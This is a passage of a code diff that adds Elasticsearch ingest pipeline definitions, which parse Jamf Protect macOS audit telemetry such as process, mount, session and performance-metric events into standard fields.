json.exec_env.env.XPC_FLAGS + target_field: jamf_protect.telemetry.exec_env.env.xpc.flags + ignore_missing: true + - rename: + field: json.exec_env.env.XPC_SERVICE_NAME + target_field: jamf_protect.telemetry.exec_env.env.xpc.service_name + ignore_missing: true + - rename: + field: json.exec_env.env_compiled + target_field: jamf_protect.telemetry.exec_env.env.compiled + ignore_missing: true + - script: + description: Convert Object into Array. + lang: painless + source: | + def args_list = new ArrayList(); + ctx.process.args = args_list; + for (Map.Entry m : ctx.json?.args.entrySet()) { + ctx.process?.args.add(m.getValue()); + } + - script: + description: Convert Decimal into Octal. + lang: painless + source: | + int temp = (int)ctx.json?.file_access_mode; + ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml new file mode 100644 index 00000000000..e16105fcf36 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_exit.yml @@ -0,0 +1,22 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_exit audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - convert: + field: json.exit.return_value + target_field: jamf_protect.telemetry.exit.return.value + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.exit.status + target_field: jamf_protect.telemetry.exit.status + type: string + ignore_missing: true + ignore_failure: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml new file mode 100644 index 00000000000..4bd0633dca5 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_fork.yml @@ -0,0 +1,18 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_fork audit logs. +processors: + - rename: + field: json.exec_chain_parent.uuid + target_field: jamf_protect.telemetry.exec_chain_parent.uuid + ignore_missing: true + - convert: + field: json.arguments.child_PID + target_field: jamf_protect.telemetry.arguments.child.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml new file mode 100644 index 00000000000..903b5f46a35 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_kill.yml @@ -0,0 +1,13 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_kill audit logs. +processors: + - convert: + field: json.arguments.signal + target_field: jamf_protect.telemetry.arguments.signal + type: string + ignore_missing: true + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_process_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml new file mode 100644 index 00000000000..0d855e3fe9e --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_listen.yml @@ -0,0 +1,13 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_listen audit logs. +processors: + - convert: + field: json.arguments.fd + target_field: jamf_protect.telemetry.arguments.fd + type: string + ignore_missing: true + ignore_failure: true + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml new file mode 100644 index 00000000000..9e83063d193 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_logout.yml @@ -0,0 +1,7 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_logout audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml new file mode 100644 index 00000000000..9fa589eca1e --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_mount.yml @@ -0,0 +1,82 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_mount audit logs. +processors: + - rename: + field: json.texts + target_field: jamf_protect.telemetry.texts + ignore_missing: true + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - convert: + field: json.attributes.device + target_field: jamf_protect.telemetry.attributes.device + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.file_access_mode + target_field: json.file_access_mode + ignore_missing: true + - convert: + field: json.attributes.file_system_id + target_field: jamf_protect.telemetry.attributes.file.system.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.node_id + target_field: jamf_protect.telemetry.attributes.node.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.owner_group_id + target_field: jamf_protect.telemetry.attributes.owner.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.owner_group_name + target_field: jamf_protect.telemetry.attributes.owner.group.name + ignore_missing: true + - convert: + field: json.attributes.owner_user_id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.id + value: '{{{json.attributes.owner_user_id}}}' + if: ctx.json?.attributes?.owner_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.arguments.flags + target_field: jamf_protect.telemetry.arguments.flags + type: string + ignore_missing: true + ignore_failure: true + - script: + description: Convert Decimal into Octal. + lang: painless + source: | + int temp = (int)ctx.json?.file_access_mode; + ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml new file mode 100644 index 00000000000..f9628191285 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_pidfortask.yml @@ -0,0 +1,21 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_pidfortask audit logs. +processors: + - convert: + field: json.arguments.pid + target_field: jamf_protect.telemetry.arguments.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.arguments.port + target_field: jamf_protect.telemetry.arguments.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml new file mode 100644 index 00000000000..1344c6fdb55 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_posix_spawn.yml @@ -0,0 +1,47 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_posix_spawn audit logs. +processors: + - convert: + field: json.arguments.child_PID + target_field: jamf_protect.telemetry.arguments.child.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.exec_args.args + target_field: json.args + ignore_missing: true + - rename: + field: json.exec_args.args_compiled + target_field: jamf_protect.telemetry.exec_args.args_compiled + ignore_missing: true + - rename: + field: json.exec_env.env.XPC_FLAGS + target_field: jamf_protect.telemetry.exec_env.env.xpc.flags + ignore_missing: true + - rename: + field: json.exec_env.env_compiled + target_field: jamf_protect.telemetry.exec_env.env.compiled + ignore_missing: true + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - rename: + field: json.exec_chain_parent.uuid + target_field: jamf_protect.telemetry.exec_chain_parent.uuid + ignore_missing: true + - script: + description: Convert Object into Array. + lang: painless + source: | + def args_list = new ArrayList(); + ctx.process.args = args_list; + for (Map.Entry m : ctx.json?.args.entrySet()) { + ctx.process?.args.add(m.getValue()); + } + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml new file mode 100644 index 00000000000..95aaec8433a --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_remove_from_group_and_aue_mac_set_proc.yml @@ -0,0 +1,11 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_remove_from_group and aue_mac_set_proc audit logs. +processors: + - rename: + field: json.texts + target_field: jamf_protect.telemetry.texts + ignore_missing: true + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml new file mode 100644 index 00000000000..70737f672e3 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_session.yml @@ -0,0 +1,21 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_session_start, aue_session_end, aue_session_update and aue_session_close audit logs. +processors: + - convert: + field: json.arguments.am_failure + target_field: jamf_protect.telemetry.arguments.am_failure + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.am_success + target_field: jamf_protect.telemetry.arguments.am_success + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.sflags + target_field: jamf_protect.telemetry.arguments.sflags + type: string + ignore_missing: true + ignore_failure: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml new file mode 100644 index 00000000000..1eed014df7d --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_setpriority.yml @@ -0,0 +1,26 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_setpriority audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - convert: + field: json.arguments.priority + target_field: jamf_protect.telemetry.arguments.priority + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.arguments.which + target_field: jamf_protect.telemetry.arguments.which + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.who + target_field: jamf_protect.telemetry.arguments.who + type: string + ignore_missing: true + ignore_failure: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml new file mode 100644 index 00000000000..8b560e1def8 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_socketpair.yml @@ -0,0 +1,23 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_socketpair audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - convert: + field: json.arguments.domain + target_field: jamf_protect.telemetry.arguments.domain + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.protocol + target_field: jamf_protect.telemetry.arguments.protocol + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.type + target_field: jamf_protect.telemetry.arguments.type + type: string + ignore_missing: true + ignore_failure: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml new file mode 100644 index 00000000000..4c2ffa716da --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_ssauthint.yml @@ -0,0 +1,19 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_ssauthint audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - rename: + field: json.texts + target_field: jamf_protect.telemetry.texts + ignore_missing: true + - convert: + field: json.arguments.known_UID_ + target_field: jamf_protect.telemetry.arguments.known_uid + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.arguments + target_field: jamf_protect.telemetry.arguments.flattened + ignore_missing: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml new file mode 100644 index 00000000000..636b41e7c7f --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_taskforpid.yml @@ -0,0 +1,23 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_taskforpid audit logs. +processors: + - convert: + field: json.arguments.target_port + target_field: jamf_protect.telemetry.arguments.target.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.arguments.task_port + target_field: jamf_protect.telemetry.arguments.task.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - pipeline: + name: '{{ IngestPipeline "pipeline_process_object" }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml new file mode 100644 index 00000000000..20a0756e242 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_tasknameforpid.yml @@ -0,0 +1,27 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_tasknameforpid audit logs. +processors: + - convert: + field: json.arguments.process + target_field: jamf_protect.telemetry.arguments.process + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.arguments.target_port + target_field: jamf_protect.telemetry.arguments.target.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.arguments.task_port + target_field: jamf_protect.telemetry.arguments.task.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml new file mode 100644 index 00000000000..e0b03bf2c0c --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_aue_unmount.yml @@ -0,0 +1,72 @@ +--- +description: Pipeline for Jamf Protect Telemetry aue_unmount audit logs. +processors: + - pipeline: + name: '{{ IngestPipeline "pipeline_identity_object" }}' + - pipeline: + name: '{{ IngestPipeline "pipeline_exec_chain_child_object" }}' + - rename: + field: json.path + target_field: jamf_protect.telemetry.path + ignore_missing: true + - convert: + field: json.attributes.device + target_field: jamf_protect.telemetry.attributes.device + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.file_access_mode + target_field: json.file_access_mode + ignore_missing: true + - convert: + field: json.attributes.file_system_id + target_field: jamf_protect.telemetry.attributes.file.system.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.node_id + target_field: jamf_protect.telemetry.attributes.node.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.attributes.owner_group_id + target_field: jamf_protect.telemetry.attributes.owner.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.attributes.owner_group_name + target_field: jamf_protect.telemetry.attributes.owner.group.name + ignore_missing: true + - convert: + field: json.attributes.owner_user_id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.id + value: '{{{json.attributes.owner_user_id}}}' + if: ctx.json?.attributes?.owner_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.name + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{json.attributes.owner_user_name}}}' + if: ctx.json?.attributes?.owner_user_name != null + allow_duplicates: false + ignore_failure: true + - script: + description: Convert Decimal into Octal. + lang: painless + source: | + int temp = (int)ctx.json?.file_access_mode; + ctx.jamf_protect.telemetry.attributes.file.access_mode = Integer.toOctalString(temp); diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml new file mode 100644 index 00000000000..a987e75035e --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml @@ -0,0 +1,83 @@ +--- +description: Pipeline for Jamf Protect Telemetry event logs. +processors: + - set: + field: event.kind + value: event + - set: + field: jamf_protect.telemetry.dataset + value: event + - append: + field: event.category + value: process + - set: + field: host.os.type + value: macos + - append: + field: event.type + value: info + - convert: + field: json._event_score + target_field: jamf_protect.telemetry.event_score + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.header.event_name + target_field: event.action + ignore_missing: true + - lowercase: + field: event.action + ignore_missing: true + - date: + field: json.header.time_seconds_epoch + if: ctx.json?.header?.time_seconds_epoch != 0 + formats: + - UNIX + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.host_info.host_name + target_field: host.hostname + ignore_missing: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + if: ctx.host?.hostname != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.host_info.host_uuid + target_field: jamf_protect.telemetry.host_info.host.uuid + ignore_missing: true + - rename: + field: json.host_info.osversion + target_field: host.os.version + ignore_missing: true + - append: + field: host.mac + value: '{{{json.host_info.primary_mac_address}}}' + if: ctx.json?.host_info?.primary_mac_address != null + allow_duplicates: false + ignore_failure: true + - gsub: + field: host.mac + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + - uppercase: + field: host.mac + ignore_missing: true + - rename: + field: json.host_info.serial_number + target_field: host.id + ignore_missing: true +on_failure: + - append: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml new file mode 100644 index 00000000000..790f00422f9 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml @@ -0,0 +1,20 @@ +--- +description: Pipeline for Jamf Protect Telemetry exec_chain_child_object audit logs. +processors: + - rename: + field: json.exec_chain_child.parent_path + target_field: jamf_protect.telemetry.exec_chain_child.parent.path + ignore_missing: true + - convert: + field: json.exec_chain_child.parent_pid + target_field: process.parent.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.exec_chain_child.parent_uuid + target_field: jamf_protect.telemetry.exec_chain_child.parent.uuid + ignore_missing: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml new file mode 100644 index 00000000000..69170ac5549 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml @@ -0,0 +1,33 @@ +--- +description: Pipeline for Jamf Protect Telemetry identity_object audit logs. +processors: + - rename: + field: json.identity.cd_hash + target_field: jamf_protect.telemetry.identity.cd_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{jamf_protect.telemetry.identity.cd_hash}}}' + if: ctx.jamf_compliance_reporter?.log?.identity?.cd_hash != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.identity.signer_id + target_field: process.code_signature.signing_id + ignore_missing: true + - convert: + field: json.identity.signer_id_truncated + target_field: jamf_protect.telemetry.identity.signer.id_truncated + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.identity.signer_type + target_field: jamf_protect.telemetry.identity.signer.type + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.identity.team_id + target_field: process.code_signature.team_id + ignore_missing: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml new file mode 100644 index 00000000000..5c4571a5ed3 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml @@ -0,0 +1,146 @@ +--- +description: Pipeline for Jamf process_object audit logs. +processors: + - convert: + field: json.process.audit_id + target_field: jamf_protect.telemetry.process.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.process.effective_group_id + target_field: jamf_protect.telemetry.process.effective.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.process.effective_group_name + target_field: jamf_protect.telemetry.process.effective.group.name + ignore_missing: true + - convert: + field: json.process.effective_user_id + target_field: jamf_protect.telemetry.process.effective.user.id + type: string + ignore_missing: true + ignore_failure: true + - append: + field: user.effective.id + value: '{{{json.process.effective_user_id}}}' + if: ctx.json?.process?.effective_user_id != null + allow_duplicates: false + ignore_failure: true + - append: + field: user.effective.name + value: '{{{json.process.effective_user_name}}}' + if: ctx.json?.process?.effective_user_name != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.process.effective_user_name + target_field: jamf_protect.telemetry.process.effective.user.name + ignore_missing: true + - append: + field: related.user + value: '{{{jamf_protect.telemetry.process.effective.user.name}}}' + if: ctx.jamf_compliance_reporter?.log?.process?.effective?.user?.name != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.process.group_id + target_field: jamf_protect.telemetry.process.group.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.process.group_name + target_field: jamf_protect.telemetry.process.group.name + ignore_missing: true + - append: + field: process.hash.sha1 + value: '{{{json.process.process_hash}}}' + if: ctx.json?.process?.process_hash != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.hash + value: '{{{json.process.process_hash}}}' + if: ctx.json?.process?.process_hash != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.process.process_id + target_field: process.pid + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.process.process_name + target_field: process.name + ignore_missing: true + - convert: + field: json.process.session_id + target_field: jamf_protect.telemetry.process.session.id + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.process.terminal_id.addr + target_field: jamf_protect.telemetry.process.terminal_id.addr + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.process.terminal_id.ip_address + target_field: jamf_protect.telemetry.process.terminal_id.ip_address + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.process.terminal_id.ip_address + ignore_missing: true + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - append: + field: related.ip + value: '{{{jamf_protect.telemetry.process.terminal_id.ip_address}}}' + if: ctx.jamf_compliance_reporter?.log?.process?.terminal_id?.ip_address != null + allow_duplicates: false + ignore_failure: true + - convert: + field: json.process.terminal_id.port + target_field: jamf_protect.telemetry.process.terminal_id.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.process.terminal_id.type + target_field: jamf_protect.telemetry.process.terminal_id.type + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: json.process.user_id + target_field: process.user.id + type: string + ignore_missing: true + ignore_failure: true + - rename: + field: json.process.user_name + target_field: jamf_protect.telemetry.process.user.name + ignore_missing: true + - append: + field: related.user + value: '{{{jamf_protect.telemetry.process.user.name}}}' + if: ctx.jamf_compliance_reporter?.log?.process?.user?.name != null + allow_duplicates: false + ignore_failure: true diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml new file mode 100644 index 00000000000..0fb4ea6fdc5 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml @@ -0,0 +1,143 @@ +--- +description: Pipeline for Jamf Protect Telemetry app metrics logs. +processors: + - append: + field: event.type + value: info + - set: + field: event.kind + value: event + - set: + field: jamf_protect.telemetry.dataset + value: app_metrics + - set: + field: host.os.type + value: macos + - append: + field: event.category + value: process + - convert: + field: json._event_score + type: long + target_field: jamf_protect.telemetry.event_score + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.cpu_percentage + type: double + target_field: jamf_protect.telemetry.system_performance_metrics.cpu_percentage + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.cpu_time_seconds + type: double + target_field: jamf_protect.telemetry.system_performance_metrics.cpu_time_seconds + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.interrupt_wakeups + type: long + target_field: jamf_protect.telemetry.system_performance_metrics.interrupt_wakeups + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.platform_idle_wakeups + type: long + target_field: jamf_protect.telemetry.system_performance_metrics.platform_idle_wakeups + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.resident_memory_size_mb + type: double + target_field: jamf_protect.telemetry.system_performance_metrics.resident_memory_size.mb + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - convert: + field: json.system_performance_metrics.virtual_memory_size_mb + type: double + target_field: jamf_protect.telemetry.system_performance_metrics.virtual_memory_size.mb + ignore_missing: true + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.header.event_name + target_field: event.action + ignore_missing: true + - lowercase: + field: event.action + ignore_missing: true + - date: + field: json.header.time_seconds_epoch + if: ctx.json?.header?.time_seconds_epoch != 0 + formats: + - UNIX + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: json.host_info.host_name + target_field: host.hostname + ignore_missing: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + if: ctx.host?.hostname != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.host_info.host_uuid + target_field: jamf_protect.telemetry.host_info.host.uuid + ignore_missing: true + - rename: + field: json.host_info.osversion + target_field: host.os.version + ignore_missing: true + - append: + field: host.mac + value: '{{{json.host_info.primary_mac_address}}}' + if: ctx.json?.host_info?.primary_mac_address != null + allow_duplicates: false + ignore_failure: true + - gsub: + field: host.mac + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + - uppercase: + field: host.mac + ignore_missing: true + - rename: + field: json.host_info.serial_number + target_field: host.id + ignore_missing: true + - script: + lang: painless + if: ctx.json?.system_performance_metrics?.cpu_percentage != null + source: | + ctx.host.cpu = new HashMap(); + ctx.host.cpu.usage = Math.round(ctx.json?.system_performance_metrics?.cpu_percentage *10) / 1000.0; +on_failure: + - append: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/packages/jamf_protect/data_stream/telemetry/fields/agent.yml b/packages/jamf_protect/data_stream/telemetry/fields/agent.yml new file mode 100644 index 00000000000..2919f7a30c6 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/fields/agent.yml @@ -0,0 +1,183 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: "Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat 